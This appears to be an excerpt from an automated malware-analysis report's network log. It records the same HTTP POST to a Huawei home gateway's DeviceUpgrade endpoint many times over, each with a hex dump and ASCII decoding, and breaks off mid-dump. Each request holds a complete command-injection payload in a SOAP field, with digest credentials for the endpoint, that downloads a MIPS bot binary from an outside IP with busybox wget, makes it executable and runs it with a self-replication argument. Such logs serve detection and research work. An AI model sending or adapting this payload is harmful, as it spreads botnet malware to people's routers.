2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 